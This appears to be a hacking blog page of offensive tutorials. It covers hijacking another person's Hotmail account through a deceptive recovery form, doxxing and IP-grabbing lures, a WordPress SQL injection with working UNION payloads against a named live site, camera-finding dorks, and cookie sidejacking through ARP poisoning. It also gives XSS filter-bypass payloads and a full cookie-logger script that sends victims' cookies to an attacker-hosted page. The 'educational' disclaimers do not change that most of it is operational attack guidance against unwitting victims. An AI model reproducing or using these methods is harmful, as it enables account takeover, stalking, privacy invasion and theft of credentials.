Showing posts with label Hackin PRO. Show all posts
Showing posts with label Hackin PRO. Show all posts

Friday, 3 May 2013

Hotmail Account Hacking

I see alot of new members joining, and wanting to learn how to hack somebodies hotmail account..or asking others to do it for them.

Most are under the illusion that there's this "hack" button you can press and you instantly get their password, however this is not the case.

Most newb's are put off by the fact that they have to keylog or phish their way into getting a password, and they resort to asking the "hackers".

But i'll provide an easy alternative.

This method is called Reverting, and you will be sending a form in to microsoft customer support to reset the password for your (or somebody elses) hotmail account.

For this method, it helps to know the person, even a little, but i'll still give you a step-by-step tut on how to find the information and fill out each part of the form.

NOTE: THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY, I AM NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM THIS.

Step 1: go here:

https://support.live.com/eform.aspx?prod...mcs&scrx=1


Step 2: Give them your victims full name.

Now, if you do not know their first name, try the following things to find it.

First, try using these two sites, simply enter their email and hit return.

http://www.pipl.com/email
http://com.lullar.com


if you want more, google their hotmail account(s), for example, type into google:

"victimshotmail@hotmail.com"


Include the quotes, cause this searches for only the hotmail account.

If you gain any results, it will most likely be forums or if you're lucky, social networking sites, that they have filled out their info on.

Go through these searches, and look at every one, even make a .txt file in notepad pasting down all the info you can on them.

Once you're done, if you havnt got their last name, keep reading..if you have, goto step 3.

Presuming you dont yet have their last name, try going to social networking sites, like:

http://www.myspace.com
http://www.facebook.com
http://www.bebo.com
http://www.friendster.com


Or any others you can think of, and search for their hotmail account using the websites search feature.
if you get any results, you're in luck, most of the time people include alot of information on themselves in there. Follow any leads you can find on the info, and even ask them or their friends (look up a tutorial on social engineering info out of people first, it will help).

Now another thing you can do is use http://www.whois.com IF your slave has their own website.

If you dont have it by now, maybe you should find an easier target, or if you're desperate, use this technique to hack one of their rl best friends, and alot of the time they have their full name assigned to your victims hotmail address, in their addressbook.

Or, I sometimes just say "I'm pretty sure I only put in my first name at registration, I'm paranoid like that" or something along those lines... It's worked for me.

BTW: This is called d0xing, or "documenting", basically harvesting info on people, it's completely legal as long as you get all your info from the public domain (forums, social networking sites etc).

Step 3: The e-mail address for us to send a response:

Simple, give them your email address... could use a fake one if you're paranoid (one you got access too), but I don't see any risk.

Step 4: Primary e-mail address/member ID

associated with the account you are inquiring about:
Here you put in your victims email address (the one you're trying to hack). Then click Continue.

Step 5: Date of birth.

You can simply give them the year, if you dont know any further then that..but if you want to be on the safe side, read step 2, and use those techniques to find their date of birth.

Step 6: Country

If you dont know their country, which you probably should, use their IP address which you will have in one of the next steps to find it, by using
http://www.ip-adress.com/ip_tracer/

Step 7: State

same deal, use their IP addy if you dont know it already

Step 8: ZIP or postal code

Same deal again, it's usually correct if you use the IP addy...just use http://www.ip-adress.com/ip_tracer/
and find their town/suburb or whatever, and google the ZIP code for it.

Step 9: The secret answer to your question

simply put "i dont remember"

Step 10: Your alternate email address

for this, you just put in the email address you're trying to hack, you dont need their alternate email address.

Step 11: Your IP Address

Okay so here's probably the toughest one, but it's still easy. (NOTE: It's very hard to revert an account unless you successfully complete this step)
There's alot of ways to get their IP, i'll give you the easy ones.

Email: Get them to send you an email somehow, it doesnt matter how, you can just send an email saying:

"hey, how are you?" and they'll probably reply. Once you have their email (dont use old emails, please, everybody uses dynamic IP's these days)
right click on it, and click "view source", you will see something like this:

...now you want to find "X-Originating-IP: [XX.XXX.XX.XX]" That is their IP address. If the email source is all jibberish and looks encrypted, try what one user suggested:

(09-24-2010 07:59 AM)TOMMIE Wrote:  This is from Hotmail? Right? I get this too..
I forwarded these emails to my broadband providers base email (NOT Webmail), then selected each one and `Save as`, it will prompt you to save in .eml format - save to desktop, then right-click and open in Notepad. You will see detail then.
hth

Website: Go here http://www.syntaxmaster.info and register an account for free, it's real easy.

Now once you're registered, go to Software/Tools > IP Stealer; and then you can type in the URL you want your IP stealer to redirect to.. so just google or myspace or something will do. Now you'll see above that they give you your URL, you just send them there and it'll grab their IP, redirect them to google (or whatever site you choose), and then show their IP down at the bottom of the page.

I suggest using spam or http://www.doiop.com/ to shorten your URL and make it custom, you could make it something like:

http://www.doiop.com/profile-329479

And viola it'll look like a social networking site "Hey, I'm katie. :) I'm looking to meet new people and was wondering if you wanted to be friends? ^_^ This is my profile btw: <give fake link>"

Something like thaat. :P

MSN: if you can talk to them on msn, then you can get their IP that way too..there's two ways, either download a easy-to-use script, or do it manually with cmd,
i'll show you how to do it manually first.

Manually: Send them a file, or get them to send you a file.
"hey, i love that song, can you send me it?" or "omg, this is the funniest picture ever".
Before you start the transfer though, goto start > run (if you're using vista, just press the windows key) and type in cmd, and hit enter.

type in the following: netstat -n

and hit enter, it will show you a list of active connections to different IP's.

Remember or take a screenshot of those IP's, because once you start the transfer, type in netstat again while it's transferring and check for any new IP's, that is your victims IP.

With a script:

IF you have windows live messenger plus (probably the best WLM IMO), download this script:
http://rapidshare.com/files/133356881/IPGet_1.50.rar
It's called IP-Get, and will show you your current msn contacts IP addresses IF you're currently connected to them with a fileshare. It will also allow you to save the IP addresses, and look up their locations.

Here is a screenie of IP-get:

There are other ways, but surely, you should have been able to get their IP by now...if not, look up a tut on it, using the search feature.

Step 12: Your internet service provider

very easy to find, use their IP, either using the IP get script if you have it, or http://www.ip-adress.com/ip_tracer/

Step 13: The last date and time that you successfully signed in

Unless you know this as a fact, either take your best guess, say you dont remember, or yesterday.

Step 14: The names of any folders that you created in addition to the default folders
leave this blank, or say you dont know (unless you know this for a fact).

Step 15: Names of contacts in your hotmail address book

give them all the contacts you know are definately or most likely in there, including yourself, and even their other accounts (they might add themselves, everybody seems to). Also give them wilma@live.com and smarterchild@hotmail.com, as most people have them added.

Step 16: Subjects of any old mail that is in your inbox

okay just use common sense for this one, things to include are:
hey, how are you, RE:, FW:, admin, windows live, hotmail staff, recovery, registration, support, lol, password, comfirmation, noreply, delivery status notification (failure).

Also, if they are subscribed to any forums (like hackforums(but please dont hack other HF members :P)), social networking sites (like myspace, bebo) or online games (like RuneScape, WoW), then be sure to include them too.

Step 17: Names of contacts on your messenger contact list

If you happen to know any of their friends, this is where you put their display name...if you dont have them added, put their first names, and if you dont know them at all, just leave it blank, or say you dont remember.

Step 18: Your Messenger nickname

If you know it, put it in..if you dont, say "i cant remember it exactly" or leave it blank.

Step 19:

The rest you dont really need to worry about, except for in additional info, can put anything else that might make you sound more convincing..like:

"please do your best to recover my account, i dont want to go and have to add all my friends again, it'd be a great help if you got it back for me, thank you in advance."

obviously dont put exactly that, but you get the gist of it :)

Okay, i believe that is it, within 24 hours you will recieve an email from customer support, they will either give you a link to reset your (victims) password, or ask for you to send it again with more info, as an email reply..and in that case, you dont have much luck, cause they can just get your IP address from the email and know you're lying :) so try again, and hope you get a more gullible staff member. If you have firefox, click the spoiler.

I did give you a link to download earlier, here is a virus scan for you guys who arent sure.
Quote:File Info
Report generated: 1.7.2009 at 14.45.40 (GMT 1)
Filename: IPGet_1.50.plsc
File size: 721 KB
MD5 Hash: 081f4ed7f145689e1911b16fc49fa4b4
SHA1 Hash: 3B9348B972ACA7006F9E38951EE76AB632F54EF0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 24

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
Malware Hash Registry - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -

Scan report generated by
NoVirusThanks.org

If you have any questions, ask here, do not PM me. I didn't rip any of this from other tuts, typed it up myself. Thanks for reading, I know it's long, I've reached the max character limit :(

FAQ:

Q: My target has moved location since he/she registered, do I put in old or new info?
A: Put in the information they registered with, the old information.

Q: I looked up where they live, there's atleast 20 post codes for that area! How do I know which one is theirs?
A: You'll most likely find they all start with the same two digits, if they do, it doesnt matter which one you pick all will work. Since they only go by the first two digits when validating the zip/postal code, you dont need to know their address or anything, you could even go by IP location.

Q: I dont know their age! What should I put in?
A: If you dont know their age, try 1992, that usually works for some reason.

Q: They wont reply to emails from me, I dont know how else to get their IP?
A: If you dont want to add them on MSN and use IP get or CMD, a way that has worked for me is using the site I showed you: http://www.reza24.com/ip and masking your link with a URL shortening site. Three sites I know of are:

* http://www.tiny url.com <<< I need to put a space in it, otherwise it's censored for obvious reasons.
* http://rickroll.it/ <<< dont worry, it's not a real rick-roll lol.

Or one somebody just showed me and it's worked like a treat:
* http://doiop.com/

The first one you could pretend is some kind of picture site, the second one you could say something like "omg dude check this out, this site makes free links that redirect to a rickroll! http://rickroll.it/custom-rickroll", but dont actually go there i'm not sure where that link leads to lol.
The third is great though, it could pass as a social networking site like myspace.

Q: Do any other webmails hosts like yahoo mail or Gmail use this? Can I use this method on there too?
A: They have revert forms too, but they log your IP when you submit it, so they will know you're not the owner of the account. Hotmail doesnt log your IP.

Hack WordPress Site With SQL injection

As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.



So lets begin.
I will use this 0day here
First of all we need to find a vulnerable page.
We enter this in Google:

Code:

# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

When you found your site you need to find admin email and username.
I will be using this site for example:

Code:

http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3



When i add ' text disappears so it is vulnerable.



NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:

Code:

http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.



We pick one and copy his email.
Go to the login page of the site.
It is usually here:

Code:

http://www.site.com/wp-login.php
And press "Lost your password?"



Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.




Now when you got:

"Check your e-mail for the confirmation link."

It means that reset key is successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:

Code:

http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Code:

http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--



Voila!
Now we just need to reset it.

Go to:

Code:


wp-login.php?action=rp&key=resetkey&login=username
NOTE: Replace key= & login=

So my link will be:



Enter new password:




Login with new password and shell it.

That's it guys.

Thanks for reading! 

How to Dox

How to Dox
Welcome to my tutorial on how to dox!
This tutorial was created for educational purposes, I am not responsible for how you use it.
Please give feedback because it did take a while to make this tutorial.

Requirements

- The Internet
- A Brain
- Simple Social Engineering Skills
- Notepad

Setup Notepad

Start off by creating a new text document in Notepad and paste this into it:
First Name:
Last Name:
Age:
Gender:
Street Address:
Suburb:
Postal code:
City:
State:
Country:
School/University/Job:
Facebook:
Picture:
Skype:
Mum:
Dad:
Brother: (optional)
Sister: (optional)
ISP Name:
IP Address:
Country code:
Region:
Now we are going to move onto getting their IP address.

Grabbing their IP Address

There are a few methods to grabbing their IP and I will show you all of them I know. :)
Method 1 - Skype Resolver

If you would like to use this method you will need their Skype username.
If you don't have their Skype username go to method 2 please.
Now what you want to do is go to http://skypegrab.info/ and simply type in their Skype username where it specifically says 'Skype Username'.

It should like this:

[Image: 3lR7i.png]

After you type in the Skype username click 'Resolve' then give it a few seconds, then it should pop up saying something like this:

[Image: 5Qp9H.png]

Voila! You now have their IP address. :)

Method 2 - Manipulation

To use this method you are going to need to go to http://whatstheirip.com/ and follow the steps there.
More methods will be added soon!

Grabbing Information from their IP Address

Go to http://ip-lookup.net/ and scroll down then enter the user's IP address where it says your IP address and then you'll have all the information that can be grabbed from and IP address.

Grabbing Information from their Domain

Assuming the user has a domain name their will always be information on their 'whois' page unless they have a whoisguard or entered fake information.
To use this method is very simple.
Go to http://whois.domaintools.com and enter their domain name in.
Now you should see a list of everything about them (first name, last name, address, phone number etc) unless they have been using a whoisguard or fake information and if that is the case there are always more of my methods. :)

Grabbing Information from their Email, Name, Username or Phone

Simply go to https://pipl.com and enter their email, name, username or phone number their and it will try to find us much information that is on the internet about that user.
If that method is not working, you are going to need to wait a few days for my next method to come out on this thread, so just stick around. :)

Conclusion

It took 1 hour to make this tutorial and it only takes 5 seconds to say thanks, so please do it.
I wrote everything in this tutorial myself, no information was copied.
Thank you for reading this tutorial, please say thanks!

How To Access Unsecured Security Cameras Around The World

How To Access Unsecured Security Cameras Around The World



Watch Security Cameras

All what we are looking at are unsecured cams from
around the world that are interfaced with the internet. So
how do you find such cameras. Just google any of these
following strings and select any result.

Whoa, you can see a live cam on your PC screen!! The
strings are given below:

inurl:"CgiStart?page="
inurl:/view.shtml
intitle:"Live View/ — AXIS
inurliview/view.shtml
inurl:ViewerFrame?M0de=
inurl:ViewerFrame?M0de=Refresh
inurliaxis-cgi/jpg
inurliaxis-cgi/mjpg (motion-JPEG) (disconnected)
inurl:view/indexFrame.shtml
inurliview/index.shtml
inurliview/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitleiliveapplet
allintitle:"Network Camera NetworkCamera" (disconnected)
intitleiaxis intitle:"video server"
intitleiliveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View/ — AX|S"
intitle:"Live View/ — AXIS 206M"
inti’r|e"'l ive View / — AXIS 706W"
intitle:"Live View/ — AXIS 210?
inurl:indexFrame.shtml Axis
inurl1"MultiCameraFrame?Mode=Motion" (disconnected)
intitleistart inurl:cgistart
intitle:"WJ-NTI 04 Main Page"
intitleisnc-220 inurl:home/
intitleisnc-cs3 inurl:home/
intitleisnc-r230 inurl:home/
intitle:"sony network camera snc-pl ?
intitle:"sony network camera snc-ml ?
site:.viewnetcam.com -www.viewnetcam.com
intitle:"Toshiba Network Camera" user Iogin
intitle:"netcam live image" (disconnected)
intitle:"i-Catcher Console — Web Monitor"

*As always, this tutorial is for Educational purpose only.
The main purpose is to keep the readers stay informed
about these vulnerabilities.

Sunday, 21 April 2013

Cookie Stealing Attack ?

In this tutorial i will explain how you can hack a Facebook/twitter accounts by stealing cookies. This method works only when the victims computer is in a LAN (local area network ).Best place to try out this is in schools ,collages ,cafes . where computers are connected in LAN .Before i proceed let me first explain cookies.

What Are Cookies ? And What Is The Use Of Stealing Cookies ?

Cookies are small files that stored on users computer by websites when a user visits them. The stored Cookies are used by the web server to identify and authenticate the user .For example when a user logins in Facebook a unique string is generated and one copy of it is saved on the server and other is saved on the users browser as Cookies. Both are matched every time the user does any thing in his account

So if we steal the victims cookie and inject them in our browser we will be able to imitate the victims identity to the web server and thus we will be able to login is his account . This is called as Side jacking .The best thing about this is that we need not no the victims id or password all we need is the victims cookie.

Hack Facebook / Twitter By Stealing Cookies ?

1. Ettercap or Cain and able for ARP poisoning the victim
2. Wire shark for sniffing and stealing cookies
3. Firefox browser and Cookie logger add on for injecting the stolen cookies in our browser

1. First ARP poison the victim .For this you can refer my previous articles on how to ARP poison the victims computer using Cain and able or Ettercap

2. After ARP poisoning open Wire shark ,click capture button from the menu bar , then select interface .Now select your interface (usually eth0 ) finally click start capture .

3. Now you can see the packets being captured , wait for a while till the victim logs in his account( Facebook /twitter ),

4. Mean while Find the IP address of Facebook ,for this you can open CMD (command prompt ) and enter .Ping Facebook.com to find its IP address.

5. Now filter the packets by entering the the IP address (Facebook) in the filter bar and click apply

6. Now Locate HTTP Get /home.php  and copy all the cookie names and values in a notepad.
7. Now open Firefox and open add and edit cookies ,which we downloaded earlier , add all the cookie values and save them.
 8. Now open Facebook in a new tab , you will be logged in the victims account .


Ra Du ......you have hacked the victims Facebook account by stealing cookies , You can also follow the same steps to hack  Twitter accounts


Hope you enjoyed this tutorial , If you have any doubts please feel  free to post a comment.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.  

Friday, 12 April 2013

DoS Attack Complete Guidance ( Must See )

DoS Attack Complete Guidance ( Must See )




This Tutorial Was Written By Ra Du And Code Hacking


Denial of Service or (DoS) attacks have matured from mere annoyances to severe high-profile attacks to e-commerce sites. When performing DoS attacks there are alot of approached techniques, including the famous but old "Ping of Death" which will be covered in this tutorial. DoS has been raging on since the 90's, getting more advanced and more serious. This tutorial is going to explain the jist of it to you.

We will start at the beginning and I will start by saying that if you plan to bring down a site with DoS its probably going to take more than 1 computer. The rage which has hit with DoS is DDoS (distributed denial of service) which is a DoS attack, but not done by one user, done by many users or a bot armie. A famous DDoS attack is the one done to GNR.com the attack completely took up all the sites bandwith within seconds. There site was recorded to have been attack by 456 Windows users.Now that you understand the god like power of this raging and more feared attack. Lets move on to the different types of DoS attacks.

---Fragmentation overlap


By forcing the OS to deal with overlapping TCP/IP packet fragments, this attack caused many OSs to suffer crashes and resource starvation. Exploit code was realeased with names such as bong,boink, and teardrop.

---Oversized Packets


This is called the "Ping of Death" (ping -1 65510 192.168.2.3) an a Windows system (where 192.168.2.3 is the IP adress of the intended slave). What is happening is the attacker is pinging every port on the victims computer causing it to echo back 65510 requests. Another example is a jolt attack a simple C program for OSs whose ping commands wont generate oversized packets. The main goals of the "Ping of Death" is to generate a packet size that exceeds 65,535 bytes. Which can abrubtly cause the slave computer to crash. This technique is old!

---Nukers


Yet another old form of attack this is related to a Windows vunlnerablity of some years ago that sent out-of-band(OOB) packets. To the consenting computer causing it to crash.

---SYN floods


A newer technique of DoS is SYN floods, basically this is done through a 3 step process, better known as the three way handshake. When a TCP connection is initiated this occurs. Under some normal circumstances, a SYN packet is sent from a specific port on system 1 to a specific port on system 2 that is in the LISTEN state. Then the potential connection on system 2 is in a SYN_RECV state. At this stage system 2 will attempt to send back a SYN/ACK packet to system 1.If all works out, system 1 will send back an ACK packet, and the connection will move to an ESTABLISHED state. Now thats what happens most of the time, but a SYN flood is different it creates a half open connection. Most systems can sustain hundreds of connections on a specific port, but it will only take a few half open connections to exhaust all the resources on the computer.

---Smurf Attacks


The smurf attack was one of the first to demonstrate the use of unwitting DoS amplifiers on the Internet. A smurf takes advantage of directed broadcasts and requires a minimum of three actors: the attacker, the amplifying network, and the slave. What happens is the attacker sends out spoofed ICMP ECHO packets to the broadcast address of the amplifying network. The source address of packets is forged to make it appear as if the slave system has initiated the request. Then all hell breaks loose!!! Because the ECHO packet was sent to the broadcast address, all systems on the amplifying network will respond to the slave. Now take a thought if the attacker sends just a single ICMP packet to an amplifying network which contains 500 systems that will respond to a broadcast ping, the attacker has now succeeded in multiplying the DoS attack by a magnitude of 500!

---Fraggle Attack


A fraggle attack is the same as a smurf attack, but it uses UDP ports instead.

---DDoS Attack


This is a much harder to block a kind of attack, it has been used against big sites such as E-Trade, Ebay, and countless others. The problem with these attacks there very hard to trace. Most traces can link back to @Home users! The new DDoS attacks are termed Zombies or Bots. These bots rely heavily on remote automation techniques borrowed from Internet Relay Chat (IRC) scripts of the same name. A group of zombies under the control of a single person is called a zombie network or a bot army. The master of these armys or networks can do full fledged DDoS attacks or SYN floods. The basic estimate size of zombie networks are from a few systems to 150,000 systems. Even a few hundred machines could prove very dangerous.



Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

XSS Tutorial


What is XSS?

XSS stands for Cross-Site-Scripting. It is basically an attack, that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into download a virus that you've created. Such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also setup a Cookie-Stealer/Logger. Anything you can do with HTML, can be used against a site with this attack. I will explain some of the most important terms associated with XSS.

What is HTML and Javascript?

HTML
HTML is sort of like a programming language. The distinctions between a programming language, and HTML, are not too far apart. They are both languages, that are used to create attributes, and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML.

Javascript
Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java, is a language that ressembles to C++, it can be used in games, and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages than HTML is. Javascript is used, more in applications outside of webpages. Like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic.

XSS: My first attack.

Now, let's start getting into the really good stuff. In this section, I'll be explaining how to use XSS to your advantage. We will also be launching our very first attack with XSS, if you know the basics to XSS, you can skip this section, because I doubt you will learn anything that you don't briefly know yet.
Now, our first step, is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) multiple queries, to test your site for XSS.
Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box, can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to their full potential because they think it's useless. You can exploit XSS through the source aswell. You can't just take any script, and edit the full thing. But editing an "onmouseover" script, is definitely an exception. I will be explaining this method of XSS later on, for now, we need the complete basics.

Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar.

So, lets try putting in the most known, BASIC query of all time.

Code:
<script>alert("XSS")</script>
That little script, is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter, is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes, these filters are very weak, and can be by-passed very easily, other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blockin the alert. Here's an example of this kind of filter:

Code:
<script>alert("XSS")</script>
>
Code:
<script>alert( > XSS DETECTED < )</script>

It will block the quotes. So how the hell do we get passed that? Well, thankfully there's a way to encrypt the full message :). We will be using a little function called "String.FromCharCode". The name of it pretty much explains it all. It encrypts our text, into ASCII. An example of this encryption, would be like this:

Code:
String.fromCharCode(88,83,83)

Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like:

Code:
<script>alert(String.fromCharCode(88,83,83))</script>
You do NOT need ANY quotes in the simple query like that. So lets put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get any alert box, try some of these queries that I like to use:

Code:
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))

Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes, you should create some too, they can come in handy a lot.

XSS: Advanced Methods

Now, in this section I will be sharing some ways to use XSS maliciously against a site. Now, keep in mind all malicious attacks sent over to a system, site, or server, is illegal and you CAN be prosecuted for these actions. So ALWAYS use protection if you're planning on doing something malicious to the site. If you want to make a little alert box pop up, you shouldn't need a Proxy/VPN.

Cookie Stealing/Logging
Now, cookie stealing is about the most malicious thing we can do with Non-Persistent XSS. A cookie stealer/logger, will log the cookies of the user who access the page to a certain document. The easiest way to do this, would be with a three step process.

First, you should setup a site. Personally, I find http://www.000webhost.com/ the best for upload malicious code, programs, or anything else. So go ahead and register there.
Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log, into our Cookie Log. Add this code, into it (Just make sure the file name has .php, or else it will not run the PHP code (Which is an enormous problem)).

Code:
<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./CookieLog.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +        // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()";        // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+";                // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert( "Unicode Character '"
    + ch
    + "' cannot be encoded using standard URL encoding.\n" +
                    "(URL encoding only supports 8-bit characters.)\n" +
          "A space (+) will be substituted." );
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>

Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin :). To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too.
To Tiny the URL, go to http://www.spam.com/ and just put in the URL. But hold one, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging.

Code:

<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

So just add that script after the URL, then tiny it, and send it to our Web-Admin, now this can take some time for the Admin to actually click it. Sometimes, the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it.
